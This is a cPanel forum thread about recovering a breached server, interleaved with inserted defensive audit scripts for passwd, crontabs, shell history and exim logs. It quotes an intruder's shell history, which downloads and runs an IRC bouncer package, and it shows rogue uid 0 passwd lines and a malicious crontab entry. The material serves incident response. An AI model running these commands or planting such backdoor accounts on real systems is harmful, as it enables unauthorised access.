
Two hackcheck notice email

Discussion in 'Security' started by reficul, Apr 18, 2012.

  1. reficul

    reficul Member

    Joined:
    Dec 15, 2008
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    Root Administrator
    [hackcheck] mysqli has a uid 0 account
    [hackcheck] services has a uid 0 account

    The history command reports this activity.

    What should I do?
     
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,478
    Likes Received:
    203
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    If you're unsure of your next steps, you can save yourself a lot of time by hiring someone who might be able to help.

    cPanel has a list of people who probably can help, located here:
    Sys Admin Services « Application Catalog
     
  3. theitjerk

    theitjerk Member

    Joined:
    Apr 19, 2012
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Los Angeles
    cPanel Access Level:
    Reseller Owner
    Is this a VPS or server you're running? If it's a webserver, could be a script or configuration error. But if it's a VPS, I'd assume you may have been breached :-/ Do you have root access over the server?
     
  4. reficul

    reficul Member

    It's a dedicated server. After I removed the two strings from passwd, as yesterday, at 2:59am the two strings

    services:x:0:0::/home/services:/bin/bash
    mysqli:x:0:0::/home/mysqli:/bin/bash

    were added again to the /etc/passwd file.

    I also found:

    sgl:x:32008:32010::/home/sgl:/bin/bash

    Some strange files in /home/sgl like:
    psybiru.tar.gz
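The condition behind the hackcheck notice at the top of the thread is exactly what the passwd lines above show: two extra accounts with uid 0. The script below is an added example, not part of the thread and not cPanel's own hackcheck; it lists every account that shares uid 0 with root, and as a second heuristic lists accounts homed under /home that have no file in /var/cpanel/users (cPanel keeps one per account, so an account missing there was probably not created through cPanel). The sample passwd content is constructed from the lines reficul posted; the /var/cpanel/users convention is the only assumption.

```shell
#!/bin/sh
# Added example, not from the thread: audit a passwd file for the condition
# cPanel's hackcheck reports ("<name> has a uid 0 account").

# Constructed sample in the shape of /etc/passwd, built from the lines posted
# in this thread plus two ordinary system accounts.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
services:x:0:0::/home/services:/bin/bash
mysqli:x:0:0::/home/mysqli:/bin/bash
sgl:x:32008:32010::/home/sgl:/bin/bash'

# Print every account other than root whose numeric uid (field 3) is 0,
# one name per line. Prints nothing on a clean file.
audit_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Number of uid 0 accounts other than root; 0 means clean.
count_uid0() {
    audit_uid0 "$1" | wc -l | tr -d ' '
}

# Heuristic for accounts cPanel did not create: any account homed under /home
# that has no matching file in /var/cpanel/users (cPanel keeps one per account).
# The second argument overrides that directory so the sample runs offline.
audit_orphan_homes() {
    userdir="${2:-/var/cpanel/users}"
    awk -F: '$6 ~ /^\/home\// { print $1 }' "${1:-/etc/passwd}" |
    while read -r name; do
        [ -e "$userdir/$name" ] || echo "$name"
    done
}

# Demo on the constructed sample (a real run would pass no arguments).
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
echo "uid 0 accounts other than root:"
audit_uid0 "$tmp"
echo "accounts under /home with no cPanel user file:"
audit_orphan_homes "$tmp" /nonexistent
rm -f "$tmp"
```

Run with no arguments on the server itself and both checks read /etc/passwd and /var/cpanel/users; a non-empty result from the first function is the same finding hackcheck mails about, and the second one narrows down which /home accounts deserve the kind of inspection the sgl account got in this thread.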
     
  5. theitjerk

    theitjerk Member

    Ouch. You have been breached. Getting any random calls from this domain?

    -removed- EDIT - Lol, that showed up with the URL - didn't know it would automatically throw that. It translates to http[colon]3xploit.110mb.com

    psybiru.tar.gz is an IP shell, lets you use IRC through it, aka a BNC server. Disaster recovery time...

    These are all just my suggestions, I'm kinda new here, and I don't want to overstep, but this is what I do :)

    1. Backup your web-data locally immediately
    2. Change all of your passwords - ftp, web, mail etc.. In fact, kill FTP altogether if you can to be safe.
    3. Make sure any non-cpanel scripts are updated, if you can, term them too.
    4. Go to your raw IP logs, turn on archiving. Maybe you can figure out where the POE was if you check the detailed records. Guaranteed you have a secondary user setup somewhere with vulnerable permissions.
    5. BLOCK anything from 110mb.com. It is a 100% temporary solution, but it will stop the automatic reinstall of the shell in question for a little bit of time for you to examine the logs.

    Are you running webdav? Again, if you can turn it off, do so. The webdav exploit isn't new, but it's been popping up again on the underground forums.. weird how old stuff can come back to bite ya, huh? Oh ya, block anything related to IRC and BNC if you have no dependencies. This will all just buy you time, but that's exactly the thing your pesky intruders are looking for too.

    If you can figure out if you have any IRC/BNC connections and what the source IP's are, I would be happy to do a little research on those myself. Nothin' like a little honeypot action to start my morning off..
     
    #5 theitjerk, Apr 19, 2012
    Last edited by a moderator: Apr 19, 2012
  6. theitjerk

    theitjerk Member

    Reported to 110mb.com. They take care of this stuff pretty quick, but take care of your situation ASAP! Feel free to let me know if you need help, I'll be around for a couple more hours if you need anything (applies to anyone else having an issue with this). Just checked, this domain has been around for a bit.. weird.
     
  7. reficul

    reficul Member

    Thank you for your help. I want to make first a full backup and after that we can play with this.
     
  8. theitjerk

    theitjerk Member

    Glad to see your head is in the right place. Remember, your backups will likely be infected to some degree as well. Don't just pop them right back up without some proper analysis..
     
  9. reficul

    reficul Member

    A fast tip to block 110mb?
     
  10. theitjerk

    theitjerk Member

    You can either block the FQDN (fully qualified domain name) or a single IP, or a range. In this case, I would block a range (10.12.12.1-10.12.13.1), since 110mb is a shared host, and a popular one at that. Use the IP Deny Manager in cPanel.
     
  11. reficul

    reficul Member

    A little update,
    I also found:
    * * * * * /home/sgl/components/y2kupdate >/dev/null 2>&1
    in the sgl user's crontab (not configured by cPanel or me).
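The crontab entry above has three properties worth flagging on any account: the program lives under a home directory, it runs every minute (a watchdog that restarts a killed process), and all output is discarded so cron never mails an error. The script below is an added example, not from the thread; it reads crontab text on stdin and prints each entry that matches one of those rules with its reasons. The sample crontab is constructed: it contains the line reficul posted (with the mangled `>` characters restored) alongside an ordinary job and a constructed `@reboot` entry, to show the rules separating them.

```shell
#!/bin/sh
# Added example, not from the thread: flag crontab entries of the kind found in
# the sgl user's crontab. Reads crontab text on stdin and prints
# "REASONS<TAB>ENTRY" for every entry that matches at least one rule.
# On a live cPanel/CentOS box the input would come from
#   crontab -l -u USER      or      cat /var/spool/cron/USER

# Constructed sample: one environment line, one comment, one ordinary job that
# runs a script through the system php binary, the entry from this thread
# (with the mangled ">" restored), and a constructed @reboot entry.
SAMPLE_CRON='MAILTO=""
# nightly report
30 2 * * * /usr/bin/php /home/sgl/public_html/cron.php
* * * * * /home/sgl/components/y2kupdate >/dev/null 2>&1
@reboot /tmp/.x/run >/dev/null 2>&1'

audit_cron() {
    awk '
    NF == 0 || $1 ~ /^#/ { next }                    # blank lines and comments
    $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/ { next }         # VAR=value lines
    {
        # Split schedule from command: "@reboot CMD" or "m h dom mon dow CMD".
        if ($1 ~ /^@/) { sched = $1; cmd = $2 }
        else           { sched = $1 " " $2 " " $3 " " $4 " " $5; cmd = $6 }

        reasons = ""
        # Rule 1: the program itself lives in a home or temp directory.
        if (cmd ~ /^\/(home|tmp|var\/tmp|dev\/shm)\//) reasons = reasons "runs-from-user-dir,"
        # Rule 2: runs every minute, typical of a watchdog that restarts a process.
        if (sched == "* * * * *") reasons = reasons "every-minute,"
        # Rule 3: all output thrown away, so cron never mails an error.
        if ($0 ~ /> *\/dev\/null +2>&1/) reasons = reasons "output-discarded,"

        if (reasons != "") { sub(/,$/, "", reasons); print reasons "\t" $0 }
    }'
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_CRON" | audit_cron
```

On the sample only the y2kupdate line and the @reboot line are printed; the php job is not, because its program is /usr/bin/php even though the script it runs is under /home. Looping the function over every file in /var/spool/cron gives the same check for all accounts, including ones that, like sgl here, were never created through cPanel.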
     
  12. reficul

    reficul Member

    .bash_history on the fake user:

    Code:
    id
    sudo -i
    hostname
    w
    logout
    cat /etc/ssh/sshd_config
    sudo -i
    id
    w
    wget -removed url-
    tar -zxvf psyBNC-2.3.2-7.tar.gz
    cd psybnc
    make menuconfig
    sudo -i
    make menuconfig
    whereis ld
    make menuconfig
    make
    ls -al
    pwd
    pico psybncchk
    ./psybnc
    kill -9 24536
    ps -c
    ls -al
    cat psybnc.conf
    pico psybnc.conf
    ./psybnc
    ps -c
    ./psybnc
    ps -c
    cd
    ls -al
    wget -removed url-  -zxvf psybiru.tar.gz
    cd components/
    ./config 1234;./****************;./run
    cd scripts
    rm -rf DEFAULT.SCRIPT
    wget -removed url-
    cd
    logout
    sudo
    sudo -i
    ls -al
    ps -c
    ps -x
    killall -9 psybnc
    cd psybnc
    ./psybnc
    cat psybnc.conf
    ps -c
    pwd
    killall -9 psybnc
    pico psybnc.conf
    ./psybnc
    pico psybnc.conf
    killall -9 psybnc
    pico psybnc.conf
    ./psybnc
    sudo -i
    cd
    killall -9 psybnc
    ls -al
    cd components
    ls -al
    pico psybnc.conf
    pico ssstt
    rm -rf ssstt
    ps -x
    killall -9 psybnc
    killall -9 psybnc
     
    #12 reficul, Apr 20, 2012
    Last edited by a moderator: Apr 23, 2012
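The history above reads as a timeline once the noise is removed: privilege escalation (`sudo -i`), a look at the SSH configuration, download and build of the bouncer, then repeated restarts. The script below is an added example, not from the thread; it tags history lines by what they do so the sequence can be read at a glance, and prints one tagged line per match in file order. The sample history is a constructed subset of what reficul posted (the URLs stay removed, as the moderator left them). One caveat a practitioner should keep in mind: a .bash_history can be truncated or edited by whoever had the shell, so an empty or clean file is not evidence that nothing happened.

```shell
#!/bin/sh
# Added example, not from the thread: tag the lines of a shell history file
# that matter when building an intrusion timeline. Reads history text on
# stdin (on a live server: cat /home/USER/.bash_history) and prints
# "TAG<TAB>COMMAND" in file order; a line can get more than one tag.

# Constructed sample, a subset of the history posted in this thread (the
# URLs stayed removed, as the moderator left them).
SAMPLE_HISTORY='id
sudo -i
cat /etc/ssh/sshd_config
wget -removed url-
tar -zxvf psyBNC-2.3.2-7.tar.gz
cd psybnc
make
./psybnc
ls -al
pico psybnc.conf
killall -9 psybnc
crontab -l'

triage_history() {
    awk '
    function tag(t) { print t "\t" $0 }
    {
        low = tolower($0)
        if ($1 == "sudo" || $1 == "su")                       tag("privilege-escalation")
        if ($1 == "wget" || $1 == "curl" || $1 == "ftp")      tag("download")
        if ($1 == "tar" || $1 == "unzip" || $1 == "gunzip")   tag("unpack")
        if ($1 == "make" || $1 == "gcc" || $1 == "cc")        tag("build")
        if (low ~ /sshd_config|\/etc\/shadow|sudoers/)        tag("sensitive-file")
        if (low ~ /psybnc|psybiru/)                           tag("known-irc-bouncer")
        if ($1 == "kill" || $1 == "killall" || $1 == "pkill") tag("process-kill")
        if ($1 == "crontab")                                  tag("persistence")
    }'
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_HISTORY" | triage_history
```

Untagged lines (`id`, `ls -al`) are dropped; everything else keeps its original wording so the output can be pasted straight into an incident timeline. The `known-irc-bouncer` rule is specific to this thread's tool names; the rest are general enough to reuse on any account's history.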
  13. reficul

    reficul Member

    With visudo I also found:
     
  14. reficul

    reficul Member

    Is this the hole?
    Code:
    /var/log/exim_mainlog:118423:2012-04-17 13:29:12 1SK6au-0006Vw-Tw <= user@myserver.com U=user P=local S=549 T="Fx29Shell http://domainaccount.com/wp-commentsrss.php?act=img&img=buffer by 180.252.**.***" for email@gmail.com
    
     
    #14 reficul, Apr 20, 2012
    Last edited by a moderator: Apr 23, 2012
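What that exim_mainlog record actually says: a message arrived (`<=`) through local submission (`P=local`) from the system user of one cPanel account (`U=user`), with a Subject naming a PHP file under that account's web root. Exim only recorded the mail; the file named in the subject is where the account's web code needs to be examined. The script below is an added example, not from the thread; it pulls the arrival records out of log text on stdin, tolerating the `file:line:` prefix grep adds, and flags subjects that contain a shell marker or a link to a PHP file, reporting the submitting account for each. The sample is the posted line plus a constructed ordinary message and its delivery (`=>`) record, which is not an arrival and is skipped.

```shell
#!/bin/sh
# Added example, not from the thread: pull the "<=" (message arrival) records
# out of exim_mainlog text and flag the ones whose Subject looks like web
# shell output, reporting the cPanel account (U=) that submitted each one.
# Reads log text on stdin; a grep "file:line:" prefix like the one in the
# thread is tolerated. Output: "DATE TIME<TAB>ACCOUNT<TAB>REASON<TAB>SUBJECT".

# Constructed sample: the line posted in this thread, plus a constructed
# ordinary message and its delivery ("=>") record, which is not an arrival.
SAMPLE_EXIM='/var/log/exim_mainlog:118423:2012-04-17 13:29:12 1SK6au-0006Vw-Tw <= user@myserver.com U=user P=local S=549 T="Fx29Shell http://domainaccount.com/wp-commentsrss.php?act=img&img=buffer by 180.252.**.***" for email@gmail.com
2012-04-17 13:30:01 1SK6bZ-0006Xa-1q <= user@myserver.com U=user P=local S=612 T="Your order confirmation" for customer@example.com
2012-04-17 13:30:02 1SK6bZ-0006Xa-1q => customer@example.com R=dnslookup T=remote_smtp'

flag_exim_mail() {
    awk '
    {
        sub(/^\/[^ ]*:[0-9]+:/, "")            # drop "file:line:" grep prefix
        if ($4 != "<=") next                    # keep only message arrivals
        user = ""; subj = ""
        if (match($0, /U=[^ ]+/))   user = substr($0, RSTART + 2, RLENGTH - 2)
        if (match($0, /T="[^"]*"/)) subj = substr($0, RSTART + 3, RLENGTH - 4)
        reason = ""
        if (tolower(subj) ~ /shell/)             reason = "shell-marker"
        else if (subj ~ /https?:\/\/[^ ]*\.php/) reason = "php-url-in-subject"
        if (reason != "") printf "%s %s\t%s\t%s\t%s\n", $1, $2, user, reason, subj
    }'
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_EXIM" | flag_exim_mail
```

Feeding it the whole of /var/log/exim_mainlog (`flag_exim_mail < /var/log/exim_mainlog`) gives, per account, the first time such mail was submitted, which is a usable lower bound on when the web code was compromised and a direct pointer to which account's document root to look in.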
  15. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Do you mean it is WordPress? Because Exim cannot execute commands that would cause this type of issue.
     